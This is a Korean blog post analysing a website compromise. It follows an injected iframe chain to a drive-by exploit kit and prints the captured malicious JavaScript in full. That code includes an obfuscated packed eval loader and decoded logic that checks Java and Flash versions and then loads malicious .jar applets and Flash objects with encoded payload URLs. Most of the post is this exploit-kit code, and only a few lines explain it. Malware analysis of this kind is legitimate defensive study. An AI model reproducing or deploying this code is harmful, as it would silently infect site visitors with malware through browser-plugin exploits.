본문 바로가기

Hacking/web

CKVip 사고 분석

Cirrus.Kim 2015. 5. 3. 11:54

1. http://iwtour.intermotion.kr에서 발생.

2. page에 삽입된 iframe을 따라 Decode하며 접근

bomnal3040.com -> gym****.co.kr

3. Hex Decode 후 분석

gym****.co.kr/eml/***

<script language="javascript" src="http://count2.****.com/click.aspx?id=26743530&logo=5" charset="gb2312"></script>

<script type="text/javascript" src="swfobject.js"></script>

<script src="jquery-1.4.2.min.js"></script>

<script type="text/javascript">

var winer = navigator.userAgent.toLowerCase();

var apple = deconcept.SWFObjectUtil.getPlayerVersion();

if(document.cookie['indexOf']('a949700')==-1 && winer['indexOf']('b'+'o'+'t')==-1 && winer['indexOf']('sp'+'i'+'der')==-1)

{

var expires=new Date();

expires.setTime(expires.getTime()+6*60*60*1000);

document.cookie="a949700=Yes;path=/;expires="+expires.toGMTString();

var xmPpPuD='**********var***out**str*len*charCodeAt**case**c3*length**return***if***0xff***c4***while*break*sum*c2*String*fromCharCode*0xffffffff*mx**char2*63*c1*nbChar*function**AVgHbu2f*X3cQCMIIF*ErTiUlaxlkP*do*for*BMOYPRD4H**0x3F*join*vl*6b***********char3*str2long*delta*sl*65*false*GIEMslIELDjE*NtCion*long2str*nbcode*74*nbencode*utf8to16*KEY*key*UlRxhd4UuIVRDTa08x0LQctCcxgmA276TnelHQ9NGv9mIcTdRk1bSZAE3b3uSew1QT0kfHZKS*rUofVSFLIUDNXi7Qr97nW4Udk*PEgg66EMZSPqbIz2sHAt*4ZIKJvX3sGDPTQlBetd9IAjxvdtbxfI3uqM4jFtxvytM9zLQobyDvAAPgMLeKK4qjGYNJw1M3NzjBp9HDMyxWdwRW8*ySr*QgEnBcyl5MVmhMHDMPzcYUU61BO3sQzqETsiXYI*O75*8sdAtex*5kOMOWmCbKCqWDMeyoogPbCsPCfPbSKjjBjbLw*bHgoNSGS*0i5k16GAujvKsGxbSyzqJkg42WZyWc7SCfZ5TDeIg38vpqXfKqm*9ypav3MSoSaJlOGSWaFFpcj7fKv6AY8wPIqMuKAzbMhSq4Nyqn9Dnzx4WB4oPRpVh7Kel4RIGfIKKNnPuhL1fAeAIug0rYnbZT0xelA8CJEz7gxlYwh0o9QU2SKz*mfHjs9nQb5NUK7ct1U3O*Cg*6ikmVPoC49RNK*zVlkSHQshH5Wu1zMsc2qXX0ppzjtiwhI6gRoJ640KUHqdo76qkmY9SLdXUVDAccRjW938YqVzBhIpoci8zmKYQIKl3Vpm5VjImFWiSzw1y0bloNyJvcioC28w*FAJc5zRY0sfz8f1M9Ys55QABuieMTwVEZmHKoUXqfpEAtMOPOt*switch*0x30*Math*Array*0XF*0x3C*0x9E3779B9*0x03*9TBYmSMA9baxPQ*new*else*72*77*81LT1BtOlOQStg9ahTIx6xc*69*charAt*0x0F*0x1F*nM5KMbohDE1lmMNQOpJF2x*WKaOLmjw4fAF16QsJmkP4b***********uAhWVuQZp**57rsUSjw0SBk3a5x1sioAnsv1Iz3JuFAJQxa22xTXEguMdx*rX2VCVjJ0jqcYfjHaAUS87OP46vLbqM0yuzo1UkdAKzE2h*k85TlW2tQTFyMY9R9fIN19XKdHvQbvjph6Rd9qcxKqEhhx9l90KdrScSu4SEQZZ27P3aqtqAf8ODgttRNz4H*Pi0TKGI9F*Eu7ddumOBBwRnUiE1dW1QdCLgN55Zx1lbQPxwfabfEFLWhS9U7cCY2hYUGifR*Ce*EvVyeQD7u9yjwieWS9bjlQFZbYqID1b4Hku76z49ey78iXRnGJRmYMN*JYtFr2aU6Q65ai*EBvM1GrFCoDaOieO*AmdQfU8BF*AmG20kXWlMoIJIlaF5C0riYG7uMkXR6pDurGbZvKE*Do6F20v6tP9vVAW0DDhx7WbbN6Gi9tHo9ckaNqYXnbLzQxEFTptxOk4J4M*Xq3H*ufbh16a7wv1awsSjA6huIMmCgNA6j3TzVQKIb*GNaG4TLXs3P6tBSOQQyoYfPFOkdB8NwAz8fva*uOJpx400S5FiG6OIt*rEKkHs5y9GxAzC29mcQtWr8iu6*8ZoQ6R4VZTTLZpEhEqNyK8Pyq8dkqJoC1Lz*z4h7MFZtfOdeToeaRBuqze*75*6d*6e*6f*64*eval*unes*cape*Lrmj1qgQ2Ne8OuBCgZn0ZP2wwqJ6h6RXq5xyGqdf3QZP4y3qzFSRrU0lbR0q2*7v99vHO8MLqhILMr60sBcuJXonidWnTK7WJa1LtPt67uND38uPWmqYHDiH1v*vpCvQSQhz9D94ybN62avqcNQCFNDIB38VEWjrZkqAgLUPAvuzgG4nP2YLk3W5D5sHJWm*HsZuqBi4LOucCD*yeu8riipav6FLuv*L6VlvuB*JTOUkIYrT*YSA*5As2luW07R05BYxA5TKY1imUJL9eRU04X6cDgkGBj7CJx9EZwjwM0h2ye*zwtaa*drgc5scC*Uj4PG*tgEoQ1vrFd28cbr2jlTmJkY0Xinkar0NdWYziIfxLpyI*c89fbpZA3Xg8eAg5h6Zc5tUCPGzyWDEDdTpbVgcYwnDv2C*LiUMmYSVS*C7QjlbRp*RcDInivmV6yqH*wfXAIDBKq2QZhEHxrAN002fheT5lsIFucCejG3F3I2ogxJJum*yy*VYeU4FiHO4oeXvkoTNcxbdrCnrRmqY0PX2Q1yLJYhIUUnz4XCac*64p1*GLM1VMf7zAOEP5WH5uoahszjaaRugEPykL0VaCwr7JsQP*TgMEif8Zjj75DwjPqxvgUnamEJGsLhDGXgvbWRiO2fUinF6pCn0PE6daZ0C89q4phZqQnOXOFI***********F1godH0wqzU2dVMgDRw0B*qPBbX4PXlpwLy1nG9QCdWxFtUHOdvRQ4fnzk7jaoLHcaonSMBgVElspA1BOnDWCRC49uAbkRFDD5De92zicYWNxv3wNZdDYY9aolMvKdow2GJFm*floor*uUC56CwBhCr4DctzJ9HTcZwOyTUgV2VVXarDfnQHchZTIM5tGF7gSJIn7E0eGbnt1g0I2BycIUkB9FGMeOZovvOeiun4nIxxYwWBHbsErGMh0a8QgAZZD6odHURpwjq4Ux*iX6aW6pgK0EqF*qZcJ6tjmOKx0bDsJ1iWa0fUTppdhkAjTj*frye3wKo*jB0gRuoPC51apcClblDHkJih*cxAaBPSM37QqBXm4utivkO2Ya2840eb*GNGSIwtmEdFixaqqGnfTf6x5W3Rqs*HvYC*WUnVO8u2g2HgLPeVlvDRJPHk5OEmTT*53zsb2YdTonC4hKpbGte*SagtzzUaawz3z9tmyz2NNydx326HjB1EyRdGXNgNQR*7OcmsSWnIQULUIgoUwkz3m*yhwvXDgMsKRXz*Pk465evTaNyL*1fdBviHPSEsfGbSONzioTM63VWunXy6CRwe77W7rzstZ98Sx0gILXU95XnDAh2yIaU8agMkBBt9lnHE3UskUBR8Yu7QdtvhxCXb*JtCmfS6eV6YYdRJwWySAycWaR3IBCobgDQs4CbxZyOEARwNZEIXk5MQPOJEprir*guDiFqwUrsjILxCdlC9V8hoDvuQEnUdNqP5W9hDGE6brEdnbuFQVj315E1aDOKIoF2JA2ZBQy9Hyg0n*MtsnHjWoSvbsz48sF*kTYEXcoe8Lo5AjrE7FPj3ayEa2i8ycPBGGnVDh25An8UqvXsPFiWJUV1rAGjvwh*rgw0pwbJhzrBFSWSULn0HYevOsGLg81Gj*8CLWyVMalj*h2dBdiawLhkL39goa4qdvR7Td1EexcHeJ1Mp58BSaC2ryAk3cswDXfKp5*ShSrCXWZA6llSMOg8CGzZQEXU9jNoNGru9SPfXksjZv87tUhLBJmU0eIksfQhJya4zwIabfcD0YzrNz7ytgsYvO5vokYiYChl7jiGwS0lmRZrLdNuDujqPxwDpymkeU36uMRMQa236xLatxo*G3BzIXvbK8qVD7ETWJ0bPOO5a0XihBVXGME0o*iwv3AvU*substring*6M63jtIWxkgniaIa3hXMv25nWA6MEVsPI0OD0zxW2qk9lhBwxs33MQwwvsvxu1QTZ1CNzVrWG57TxXDQ52j1M81BO*3HmAUz0g*cxywiA0sEANkQRwAP00GAf7py7OnLxS6h00EMUGP7hyv1h43Hkfd6K78BeX3YIPldZqppT*sZmJPKr47NzVhnmcGOPGk0v6Li*6t61XJb*6pTcyNVa*w8v7HYc*g3PySbEiGTj25qvUEcO*4b1gFRDfwIZDXlbXt6YPLbP7IApHn2wUlyDQDBdPlFCGOZhNaAh5MyeQd3yoeMWXG5*Oi8gxBik91wB417hAd3sgt5VswPIwam4Qx*nD*FBZGzDF*xA6BGXJBPwF4TqfBpMyCnI*lmi*RZ3evrhTjV940PODrL70lhQ6Lj9H6cBrkaaoB*qMV*tta7yGoZ8bbhEIasy5vkvyPmzYKtoiAAwk2DheFTvdWr4AaDI98JXt9iZqUgnH8UdppFitpzGGajFYg5QI01*D4Zd*68ustpZbsZZyY2JOk*TH3ympTTeeckIUOwMMD1*iLw3DrlTnigfmL4mo3nRDDKYJrfCl0m9KUjxQIU7*QnRP2xYDf0raCL0lcNdc65QffUYqrG3ZX4JGxeIIxoUQOIk38IMU87GgYqtWawJ445eESWSHT88cpsfiNTRF1dPOgGSofX7GwCtwbmeEYAL*pxGq2HwGSdFuKi7DOWFDhNs***********908z*wZU0HiQqHu4VEiMSRiJHAsMI3q4NuPJylACZEGK7OCV3xUNKpYPKIweS7tWPpTuW9OzXvDSXmZbyqiQQ3T3sq9oMHSc56nGdwNTJicdQ6jyvgPUz6fS6HJr0xQsBeVTONDahUI76JoKJNyasfaUejUPhPEfktGGLGZGLUsauFtcLUIoeDnzgI9tRxEQVdlyQmH7xTGlFuIjyrvRXq4eCTlvf9joeEplFRyFjnYqIkTHKO84HweinGOAVXJ9gpCPT243vLrfX*eaDYhcOhKHxKceN6fQkXyxvZ*QXvVSPRJ*lga*CfL1YiXzKWzeLHIl*5rq1WxGgnKkL20Qbc1tYcVj4*bqFUHZEGUFFheRIu*afDFnrf9*ufvedCStpc7VtfzLMwZfnw8z*LJNVVBHIEKUY7eLEBHAjWcWwYHhEGDZCJiOuPtUoDOcnmK8GiGpOa1NrJKcShD*dZ1H*5nFVG1wjs3myInJQ*sB1wbpm8JDlYFVqK2NWUiIAA7MSPVb9a1rifxnK6SMNmlX6*DBmIVz*45Ivy2yDvQotMNoOIpAECjBk2SUe3yy9tHwrHL7q*f0WdPNMLi2w7*Cz3IwGtOOobJ*WWnFcBuKOTuH1Z38JFOUctiSyI01mNlNPDIKTsJIlboSWbTV9DEb1K56YHt39Tm7pP6ZeTM0kZIc4NFd3K4NWo4x0OEBJG4VR7pUSZ6SJv2pWIFy6uF7SBto7kvuEe*E6fHWqHCAMu7h6m5Yv*zucIj2E6Y0dNOcZbtriMRAvnXEDHh9XeDhnaVSJR3lG*cT6FDIYL5wX37HpkWgdsrw*b2vkGh0lDPcMA0ry82Y7TeBunhSudzyOiNmRFBr73H*Hmm68zWyoHPB0C75eoLcgQTA60KFj*e1R5KZoNfVj7B8pBFSwILSTkL1ssqydO5gi*F2rb9HjVpgeUKHLEnIqIeWKDfnM*lfNyxw5*FOPMU8HqJYhavEqr7Y6yDUyM55N7JAtJ0Xeq86qS*YHrrqxAyRopCwJf*DVw5NjvoK9APsNiX*XmxKb2ggGRogGpAjzxTVzch3o6UTS3Kb6W4fY*EfD5Dp*2ntbb*L1TdQXldrghG0or6t4h2NPZmxQTgNkGi*xeR014kZ3YWCmRBkBVe3UOqA8D3huQc085CgrXXQoY2z*B7vJ5v5MfhAJsOugRvGfVJgvkvVITvlo9f*tcfxRwVKPitoLDGMoNEfN9YtoI*Y6*W7e91D7lp11IBMvoat0pR1MXZADeGmPBq*2CA1s3x39Mdrt5DqIybthP*8Gmb2sMBteYUuyPS70yzS8OIYpJ8Z9w1ns2VVSVUBlDnT4XX6TPdM*DIdklk0vRIQLvTzGQTnlk7RL4WrgPk4US53y05nLHgSQJ*ZFYQQ5UuZ7JIXMODBTDdo25YXpzndAs0*5NDVuPYh3VrAicHzjUmsnedhQOJx4koJSKlqP4l7aq*window*AX*aOJDowAVmVjIvoWcjI6JkZIw3Q6dMzIKQKDwWiE8OSaUnf002P*4TQKntP8N4rphGjcT7fCoAm5yo*idm4rCWiZuq6egcO7xM9mJmWxku78n2gMWlRavoi5HGmhsK81C52tI*kZx9aEs*rat3pa2P0zowaPiZa3Bnxvp7uytIaCSBjgqOkJDzhG69T4Cy3HtVzlNRyR4vTLx6fLDi8xRyOKKxocypB*T6rkOEnagIfp6ExB7sBYslg0XQPikM9EdSGy81J6ONtSG***********wBrXG*SX2UWPMUGSCLbZ71Lo3UfE70cp7OEy8ajBsK6RqCQDGmZdLMqLkRnaVJV5xNwpbKsG9IPZUuLFMqrKTert6Z*JfEBL54Il0CbnAmUx8rFZdRnwSzIUVZMOHKaz5L*ghB6zwYLTkmQlWwQG647Iuq*X01cal8aPKN9DIOQWXgQvYN6k9tMkVQ7uL3d9hhAGG0YRF*JYKGWZ*AVTKNuVpypBR0sgj1O*yqHAwObokHxWNXNeHoT95so5nt2hwcQF48i4nENmE3*YirX7nIFrFGXKeRLdOoIl4NzBIeffkBkfHwJSzZbccpSCIYqGi89kWjWGMGu5SKq9qEeU*NkN15rpU50HR6uyExSMdkOA7rX6CMz1WWNgA3Sytf7dXVOk0x8zFJoPdGoZ04Njs*89p0dDqirKfuDTMGJ4pPL5dvqjaiERnhzVcf4aYNx078JM6oqW4gwclpSSAGRO8QsGO0ItjVQbfWcf1lhrXV4CEDLg8fSszjhN7JvzwHuAvY3ubQq55ZPJeBBHZagK7*YQz6cKnbig7wssF9*OkTaYxXDnqOaKisKKH5lQCqYf8V2GUptR4X9JlwnwmToc7qe9*znFFCvpdwcwjRM*HawDhY98aeEtap*pZQlqUuf*JCdZdhuBw2VNu7m0jaI8xf1*KbR*4jvAocJNq5UzS34pId*r1*KWYrtuZ3pXM2lAgovGCHckn2ppgQGJYg2aBUap873NPxX5Y*dDlu07yAqVYGuoAk67vkP1bwq7iogTLnDW7uYTG30fj*5FQohuv7T0Uyedhy9AiNzqkKZL7SqcQLaPylxRuzxdLoQP7UsmjHvwWZNVsrZxMm28LXHv58ZnRxOnoWYRW6PWrJwedNiMR3QknuvCgodYhPN70DoHF4ydirFF1bNADgInRAI9nh456FH6HkauoH85XBor9Szlmu7qS65GKap*WdPF1pU77fYgWRL7IuwM*KTyAOmFpSia*RCKDBqC3ZVzR59GdyATiJJ5LUkY*oQqHCtnAzuE2xfJXwCFsJpl8wOpKOdyq7AtvbY*apo*FKRUDmJ9T*bRA2KwnV8ELNdmUP9rJtwVypx6jmYPZB*vXU4HZcu6C*2eugs1lGN7Us0t6T4IyRvNhk8QCqV*ciWdmeQUport0Igz8buOw*SNYEmU*T1kJqnKoZLu3LhSb2SU*DrFUxQyYIwCVDWSbO9SpBlljEgT4BCAmHsju6qyT9d0xlTtBhMGVK9Yf2ElzjFUNp*AV81rLgmGBYNQOvSElPmI3F4XERBcPd1EnZQYCpYJTk32hhzpopXtCNYfrWgUuVDFws*QJI8gFHKCx8DFXT3f83jw3DFR34CKSN8yhFerMTEeMuK6pzCLHaJeMHxtbdImscmCfDoECVJW4H7ldTi3b6N2GV8ZezxdzK0VDqSHwGi4jCVZwMZMBszpX3IKbeLbXhwnTN*7j566LheoPUdy3WCf21YqQp498qJ1bhPZIDyN4IGDq1TPBXLoQStQqzXFnzPyLSpu5nPvCgsLrANmqZAjaLUTIHN8nCFpn*true*z3m08FQF3eR32ImSn742G8rclUs2UYJDDPHX27eVVBoUrZ3vAfnBbnm6H8Cu7jVmuNfkjiVtNbyYxzgJhcKn3ZjtGELDmfEa4XQrdOWUQhjzO6IXBa*oYmena8brxaciTWtTSKRvub5TBcR*FTZlfB7M*BBZUn1mOp3KBmbQNh1jxVzU4BhYByuwI5aG1rdatpN1uX7d2ZBQTXc1TFRIXGKgm*x0VT9EkxztGUkyL*SdubrKFPLng3dj2g8M9hvX7zqwnP2urlhVIyC*6mBjRdFx5MwWtT*yKREoaRuAQOappK5VErCktVF6wLt1kLUquxmKbwXJleRXIlHfPSyx*z1iz4fjhc05wsd5*egdszoxRs1MDEtx3cc*i1obxa5oPp0VYSNjQzJ1uLoMekhFcuJ1qb5rZod8cKfwfClQ2sRH2O1K3l9av3MQfn1OJDut*TJ8b***',xmP76x,C69df3E,xmPpPub0='\52',benz='HxDnVx.jar',audi='LhXtGx.jar',jaguar='OrRyZq.jar',GTR='dpvsetup',C69df3E3='\x73'+'\x70'+'\x6C'+'\x69'+'\x74',bBDCPCC3="0x";try{window["\x61"+"\x6c"+"\x65"+"\x72"+"\x74"](a,b,c);}catch(e){var bBDCPCC3C=bBDCPCC3+"0d";xmP76x=eval;C69df3E=xmP76x;}try{window["\x61"+"\x6c\x65\x72"+"\x74"](e,f,g);}catch(e){/*NB VIP*/C69df3E(/*4.3*/function(/*jsnb vip*/p,/*jsnb vip*/a,/*jsnb vip*/c,/*478188809*/k,/*jsnb vip*/e,/*jsnb vip*/d/*jsnb vip*/){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('a P=2A("2B"+"2C"),1g="%31"+"%32"+"%33"+"%34"+"%35"+"%36"+"%37"+"%38",Q="%2z"+"%2y"+"%K"+"%2v"+"%2w"+"%1e"+"%2x%1k",1n="2D/2E/2K//2L+2M/2J+2I/2F/2G+2H/2u/2t+2g/2h/2i/2f/2e/2a/2c/2d/2j+2k+2q+2r+2s/2p+2o/2l+2m/2n/2N//2O/3o/3p+3q+3n+3m+3j+3k+3l+3r+3s+3y+3z/3A+3x+3w/3t/3u+3v/3i+3h/2U/2V+2W+2T+2S+2P+2Q+2R/2X+I/2Y/3e+3f/3g+V+3d/1Z/2Z+3a+3b/3B+1O+1z+1y+1x+b+1w+1A+1B+1E/1D/1v/1F+1t+1u+1q/+1r/1s/1p/1C/1Y/1T",R="%1S"+"%1R"+"%1U"+"%1k"+"%1e",U;N 1m(f){a d,i,g,c;a J,1a;d=[];g=f.m;i=0;A(i<g){c=f.h(i++);1G(c>>4){j 0:j 1:j 2:j 3:j 4:j 5:j 6:j 7:d[d.m]=f.1V(i-1);B;j 12:j 13:J=f.h(i++);d[d.m]=E[\'F\'](((c&1X)<<6)|(J&W));B;j 14:J=f.h(i++);1a=f.h(i++);d[d.m]=E.F(((c&1W)<<12)|((J&W)<<6)|((1a&W)<<0));B}}o d.X(\'\')}a 1h="%39"+"%K"+"%Z"+"%K"+"%Z"+"%K"+"%Z";a M=1P 1J(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,K,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);Q=P(Q);N 1j(f){a L,D,l,x;a i,g,d;g=f.m;i=0;d="";A(i<g){S{L=M[f.h(i++)&u]}A(i<g&&L==-1);r(L==-1)B;S{D=M[f.h(i++)&u]}A(i<g&&D==-1);r(D==-1)B;d+=E.F((L<<2)|((D&1H)>>4));S{l=f.h(i++)&u;r(l==61)o d;l=M[l]}A(i<g&&l==-1);r(l==-1)B;d+=E.F(((D&1K)<<4)|((l&1L)>>2));S{x=f.h(i++)&u;r(x==61)o d;x=M[x]}A(i<g&&x==-1);r(x==-1)B;d+=E.F(((l&1N)<<6)|x)}o d}N 1i(v,w){a Y=v.m;a 1d=v[Y-1]&G;T(a i=0;i<Y;i++){v[i]=E.F(v[i]&u,v[i]>>>8&u,v[i]>>>16&u,v[i]>>>24&u)}r(w){o v.X(\'\').3C(0,1d)}1Q{o v.X(\'\')}}N 1b(s,w){a g=s.m;a v=[];T(a i=0;i<g;i+=4){v[i>>2]=s.h(i)|s.h(i+1)<<8|s.h(i+2)<<16|s.h(i+3)<<24}r(w){v[v.m]=g}o v}U=P(1g+1h);N 1l(f,1o){r(f==""){o""}a v=1b(f,1f);a k=1b(1o,1f);a n=v.m-1;a z=v[n-1],y=v[0],1c=1M;a H,e,q=1I.3c(6+52/(n+1)),C=q*1c&G;A(C!=0){e=C>>>2&3;T(a p=n;p>0;p--){z=v[p-1];H=(z>>>5^y<<2)+(y>>>3^z<<4)^(C^y)+(k[p&3^e]^z);y=v[p]=v[p]-H&G}z=v[n];H=(z>>>5^y<<2)+(y>>>3^z<<4)^(C^y)+(k[p&3^e]^z);y=v[0]=v[0]-H&G;C=C-1c&G}o 1i(v,5N)}R=P(R);t="5O/V+5C+5R/5U+5D/5A/5H+5Z+5I/5J+5K+5L/+5G/5F+5B/5M/5V/5W+5X/5Y/+2b/5T/5P/5Q+/5S/5E+5y/4k/5z+4l/4m+4n/4j/4i/4e+4d/4f+4g/4h+4o/4p+4w/4x+4y/4z+4v+4u/4q+4r+4s+4t/4c/4b+3K+3L+3M+3N/3J/3I/3E+3D/3F/3G/3H+3O/3P/3X+3Y+3Z+"+1n+"+/4a/3W/3V/6/3R/3Q+3S/3T+3U/4A/4B/5i/5j+5k+5l+5h/5g+5c/5b/5d+5e/5f+5m+5n+5u/5v+5w+5x+5t/5s+5o/5p+5q/5r/5a/4Z/4J+i/4K/4L+4M/4I+4H+4D+4C/4E+4F+4G/4N+4O+4V/4W/4X/w/+4Y/4U/4T/4P/O+4Q/4R";t=1m(1l(1j(t),U));4S[Q][R](t);',62,375,xmPpPuD[C69df3E3](xmPpPub0),0,{}))}

}

function ckl(){var bmw=new Array(263,275,275,271,217,206,206,258,256,273,260,269,257,260,256,276,275,280,205,258,270,268,206,269,256,277,260,273,206,278,264,269,205,260,279,260,159);return bmw;}function ckls(){return "JB2kHkHkgFPKLKLBFBmkKByBwBKByBmkykHkZKwBFBLBxKLBwBmkBBykKKLkkBZBwKwByk2Bygg";}

</script>

4. Browser에서 Decode하면

<script> function encode() { var omg = ckl(), x1 = new Array, x2 = ''; for(var i=0;i<omg.length;i++) { if(omg[i] == 159) { //x2 += ''; } else { x1[i] = omg[i] - 159; x2 += String.fromCharCode(x1[i]); } } return x2; } function CheckVersion11() { if (apple.major != 11) return false; if (apple.minor == 9 && apple.rev > 900) return false; if (apple.minor > 2 && apple.rev > 202 && apple.nbwm > 406) return false; return true; } function CheckVersion12() { if (apple.major != 12) return false; return true; } function CheckVersion13() { if (apple.major != 13) return false; if (apple.major == 13 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 241) return false; return true; } function CheckVersion14() { if (apple.major != 14) return false; if (apple.major == 14 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 179) return false; return true; } function CheckVersion15() { if (apple.major != 15) return false; if (apple.major == 15 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 167) return false; return true; } function CheckVersion16() { if (apple.major != 16) return false; if (apple.major == 16 && apple.minor == 0 && apple.rev == 0 && apple.nbwm > 296) return false; return true; } function flash_run(fu, fd) { var f_use = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="60" height="1">'; f_use = f_use + '<param name="movie" value="' + fu + '" />'; f_use = f_use + '<param name="play" value="true"/>'; f_use = f_use + '<param name=FlashVars value="' + fd + '" />'; f_use = f_use + ''; f_use = f_use + '<object type="application/x-shockwave-flash" data="' + fu + '" allowScriptAccess=always width="60" height="1">'; f_use = f_use + '<param name="movie" value="' + fu + '" />'; f_use = f_use + '<param name="play" value="true"/>'; f_use = f_use + '<param name=FlashVars value="' + fd + '" />'; f_use = f_use + ''; f_use = f_use + '</object>'; f_use = f_use + '</object>'; document.write(f_use); } var wmck=deployJava.getJREs()+""; wmck=parseInt(wmck.replace(/\.|\_/g,'')); var vers=flash.prototype.getSwfVer(); vers=parseInt(vers.replace(/\.|\_/g,'')); var kaka = navigator.userAgent.toLowerCase(); var ckurl = encode(); var flashurl = ckls(); if( wmck > 17006 && wmck < 17011 ) { if(kaka.indexOf("msie 6") > -1) { document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'600\' height=\'400\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaol\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'xml20130422.XML20130422.class\'><param name=archive value=\'"+jaguar+"\'><\/object>"); } else { document.write("<br>"); var gondady=document.createElement("body"); document.body.appendChild(gondady); var gondad=document.createElement("applet"); gondad.width="600"; gondad.height="400"; gondad.archive=jaguar; gondad.code="xml20130422.XML20130422.class"; gondad.setAttribute("xiaomaolv",ckurl); gondad.setAttribute("bn","woyouyizhixiaomaol"); gondad.setAttribute("si","conglaiyebuqi"); gondad.setAttribute("bs","748"); document.body.appendChild(gondad); } } else if( wmck >= 17000 && wmck < 17007) { if(kaka.indexOf("msie 6") > -1) { document.writeln("<object classid=\'clsid:8ad9c840-044e-11d1-b3e9-00805f499d93\' width=\'256\' height=\'256\'><param name=xiaomaolv value=\'"+ckurl+"\'><param name=bn value=\'woyouyizhixiaomaolv\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'setup.hohoho.class\'><param name=archive value=\'"+audi+"\'><\/object>"); } else { document.write("<br>"); var gondady=document.createElement("body"); document.body.appendChild(gondady); var gondad=document.createElement("applet"); gondad.width="256"; gondad.height="256"; gondad.archive=audi; gondad.code="setup.hohoho.class"; gondad.setAttribute("xiaomaolv",ckurl); gondad.setAttribute("bn","woyouyizhixiaomaolv"); gondad.setAttribute("si","conglaiyebuqi"); gondad.setAttribute("bs","748"); document.body.appendChild(gondad); } } else if(wmck<=16027) { var okokx = GTR + ".class"; var ckckx = document.createElement('applet'); ckckx.archive=benz; ckckx.code=okokx; ckckx.width="30"; ckckx.height="1"; document.body.appendChild(ckckx); var ckcks=document.createElement('param'); ckcks.name="dota"; ckcks.value=ckurl; ckckx.appendChild(ckcks); } else { if( (kaka.indexOf("nt 6.1")>-1 || kaka.indexOf("nt 6.2")>-1) && (kaka.indexOf("msie 9")>-1 || kaka.indexOf("msie 10")>-1 || kaka.indexOf("msie 11")>-1 || kaka.indexOf("msie 12")>-1) ) { if(vers > 1600200 && vers <= 1600296) { document.write("<embed width=60 height=1 src=ad.swf allowScriptAccess=always Play=true><\/embed>"); } else { flash_run("logo.swf", "exec=FmF" + flashurl); } } else if( (kaka.indexOf("nt 6.1")>-1 || kaka.indexOf("nt 6.2")>-1) && kaka.indexOf("msie 8")>-1 && CheckVersion16() ) { document.write("<embed width=60 height=1 src=ad.swf allowScriptAccess=always Play=true><\/embed>"); } else if( CheckVersion11() || CheckVersion12() || CheckVersion13() || CheckVersion14() || CheckVersion15() ) { flash_run("logo.swf", "exec=FmF" + flashurl); } else if( (kaka.indexOf("msie 6")>-1 || kaka.indexOf("msie 7")>-1) && apple.major==10 && apple.minor==3 && apple.rev<=183 ) { document.write("<iframe src=ww.html width=60 height=1></iframe>"); } } if(kaka.indexOf("msie")>-1) { document.write("<iframe src=main.html width=60 height=1></iframe>"); } </script>

저작자표시

'Hacking > web' 카테고리의 다른 글

웹 취약점 조치 상세 가이드(KISA_홈페이지_취약점_진단_제거_가이드 2014) (0)	2016.02.25
[MSSQL] Injection Cheat Sheet (0)	2015.09.18
[IIS/ASPX]How to find IIS VDir real path? (0)	2015.09.15
Web.config (0)	2015.09.14
[Mysqlfast]Mysql password() function Crack (0)	2015.08.04

티스토리툴바